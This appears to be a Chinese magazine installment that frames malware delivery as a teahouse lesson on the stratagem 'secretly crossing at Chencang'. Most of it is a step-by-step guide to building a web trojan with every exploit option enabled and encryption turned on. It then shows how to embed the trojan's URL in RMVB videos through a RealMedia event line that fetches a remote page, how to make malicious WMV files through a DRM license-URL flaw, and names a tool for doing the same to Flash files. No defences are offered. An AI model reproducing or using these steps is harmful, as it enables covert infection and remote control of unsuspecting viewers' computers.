木馬害人計中計連載５：暗渡陳倉

這天劉鼎正在福利彩票店里買彩票，當他邊填寫邊祈禱中個大獎時。旁邊一個人突然伸手拿走了他的筆。劉鼎抬頭一看。原來是茶博士。劉鼎好奇地問道：“喲!兄弟，這么巧啊?上次在股票交易廳碰到，這次在彩票店又碰到了。”茶博士聽了，急忙豎起食指，“噓”了一下，說：“小聲點。我是偷偷跑出來買彩票的。老板還在那邊茶館里坐著呢。這不買完還得趕緊回去!”劉鼎一聽，笑道：“成，待會兒我也過去坐坐。”

指點迷津

兩人買完彩票，一同回到茶館。一進大門，眼尖的茶博士就朝一個角落里喊到：“公孫先生你也在啊!”劉鼎定睛一看，果然是公孫牧。隨后，茶博士匆匆告辭，忙工作去了。這時劉鼎走到公孫牧的桌子旁，放下肩上背著的筆記本電腦，坐下后對公孫牧說道：“自從聽了先生的教誨后，我實在是受益匪淺啊!最近我天天看《三十六計》，不過翻來覆去還是有很多地方看不懂。”公孫牧聽了，哈哈大笑：“年輕人，羅馬可不是一天建成的。不過只要你有心學習，會慢慢明白其中的道理的。”

“那么公孫先生今天能不能給我講講新的內(nèi)容?”劉鼎問道。公孫牧想了想，說道：“今天就來說說三十六計中的暗渡陳倉之計吧!”劉鼎一聽，興奮地說道：“暗渡陳倉我知道，當年韓信表面上派兵修復(fù)棧道，裝作要從棧道出擊的姿態(tài)。實際上卻和劉邦率領(lǐng)主力部隊，暗中抄小路成功襲擊陳倉。這就是‘明修棧道，暗渡陳倉’的由來。”

公孫牧聽后頻頻點頭：“的確是這樣。此計原文為‘示之以動，利其靜而有主，益動而巽。’這意思是說，故意讓敵人看到自己的動向，麻痹敵人使其判斷失誤，而我方則乘虛而入，出奇制勝。古人對此計還總結(jié)出了‘奇出于正，無正不能出奇’的兵法要點。《孫子兵法》第五篇的‘凡戰(zhàn)者，以正合，以奇勝。’說的就是這個道理。”

深入分析

此時，茶博士上茶來了。劉鼎一看，是自己喜歡的綠茶，心想在這茶館都快泡成VIP客戶了。然后，他接著問道：“那么暗渡陳倉這一計在網(wǎng)絡(luò)安全中是如何應(yīng)用的呢?”公孫牧答道：“現(xiàn)如今木馬病毒的傳播方法層出不窮，其中利用視頻文件進行傳播就是暗渡陳倉的主要體現(xiàn)。利用RMVB或WMV等視頻文件做偽裝，向其中插入網(wǎng)頁木馬的相關(guān)鏈接，當用戶在觀看視頻時木馬就悄悄地植入用戶的系統(tǒng)了。”

劉鼎聽了公孫牧的話后，再問：“那么這種入侵就必須要使用網(wǎng)頁木馬啦?”公孫牧點頭肯定了劉鼎的話。劉鼎馬上說道：“既然是這樣，那么我就自己先來配置一個網(wǎng)頁木馬文件吧，這個我會!首先配置一個木馬的服務(wù)端程序，以后就通過它來進行遠程控制。將其上傳到網(wǎng)絡(luò)空間中，這樣就可以得到一個木馬服務(wù)端程序的網(wǎng)址。運行《霸王網(wǎng)頁木馬生成器》這款軟件，在‘網(wǎng)馬類型’中選擇所有的漏洞選項，這樣用戶中馬的幾率就會大大增加。接著在其‘插件網(wǎng)址’中輸入木馬服務(wù)端程序的網(wǎng)址，再點選‘加密網(wǎng)馬’項后點擊‘生成頁面’按鈕即可。此時生成的這個網(wǎng)頁木馬文件mm.Html就是用于下載剛剛上傳的木馬服務(wù)端程序的(注：在此用大寫的H以表示這不是正常的*.html文件)。”

實戰(zhàn)操作

操作結(jié)束后，劉鼎問道：“網(wǎng)頁木馬文件已經(jīng)生成完畢了，接著該怎么操作啊?我不會了。”公孫牧喝了一口茶，說：“首先，將這個網(wǎng)頁木馬文件mm.Html上傳到網(wǎng)絡(luò)空間中，得到其鏈接地址。現(xiàn)在準備一段RMVB格式的視頻文件，以及相應(yīng)的視頻編輯工具RealMedia Editor。打開記事本并輸入代碼：u 00：01：00.0 00：01：30.0http：//www.pcd.cn/mm.Html。這段代碼的意思是在‘00：01：00.0 00：01：30.0’這個播放時間范圍內(nèi)，運行已經(jīng)放在網(wǎng)上的網(wǎng)頁木馬文件mm.Html。輸完代碼后，將它保存為一個TXT文本文件即可。接著，啟動RealMediaEditor，點選菜單‘文件一打開Real媒體文件’，導(dǎo)入那段RMvB視頻文件，并點選菜單‘工具→合并事件’，導(dǎo)人剛才保存的那個TXT文本文件。最后，點選菜單‘文件→RealMedia文件另存為’，保存為一個全新的RMVB視頻文件就可以了。現(xiàn)在只要其他人運行這個RMVB視頻文件，就會彈出一個瀏覽器窗口去自動連接網(wǎng)頁木馬。”

劉鼎聽完，不住地點頭。經(jīng)過一番思考后，他問道：“看來惡意RMVB視頻文件的制作并不復(fù)雜，那么何必還要制作惡意WMV視頻文件呢?”公孫牧答道：“這兩種文件的利用方式不一樣，再說每個用戶的愛好也是不一樣的，所以RMVB文件和WMV文件可以針對不同的用戶。”劉鼎聽了，點頭稱是：“既然是這樣，那么惡意WMV視頻文件又該如何制作呢?”

公孫牧說道：“現(xiàn)在就來看看惡意WMV視頻文件如何制作。惡意RMVB文件是在標準的RMVB文件中插入一段含有網(wǎng)頁木馬的網(wǎng)址，而惡意WMV視頻文件則不同。它是利用微軟的Windows Media Player(簡稱WMP)播放器，在數(shù)字權(quán)限管理中可加載任意網(wǎng)頁的漏洞制作而成的。同樣，先準備一個WMV視頻文件，運行《DRM音頻視頻加密器》這款軟件，通過其‘自定義打包’標簽中的‘源文件’項將之導(dǎo)入。然后，點擊它界面中的‘認證字符串’標簽，在‘認證URL’選項中輸入網(wǎng)頁木馬文件的網(wǎng)址。接著，返回‘自定義打包’標簽，在‘輸出目錄’中設(shè)置文件輸出的目錄，在‘輸出文件后綴’中設(shè)置文件的后綴名為‘.wmv’。最后點擊‘打包加密’按鈕，即可生成惡意WMV視頻文件。”

聽了公孫牧的講解后，劉鼎感嘆道：“這年頭看電影都不安全了，什么時候才能天下無賊啊?”公孫牧笑道：“還不止這些，除了這兩種視頻文件以外，網(wǎng)絡(luò)中常見的Flash文件也不安全。現(xiàn)在有一款名為IcodeToSWF的工具，可以輕松地把一個網(wǎng)頁木馬地址插入到Flash文件中，同樣害人!”

尾聲

兩個正聊到興頭上時，公孫牧的手機響了，接聽后他告訴劉鼎自己有事要馬上離開。而劉鼎看看天空，好像要下雨了，于是也起身準備回家去。這時，茶博士急急地跑過來，問道：“今天你們誰買單啊?”劉鼎說：“當然是你啦，這還用說啊!”茶博士不情愿地問道：“為什么啊?”公孫牧說：“兩票對一票，壓倒性勝利，通過!沒有辦法，哈哈!”欲知后事如何，請看下回分解。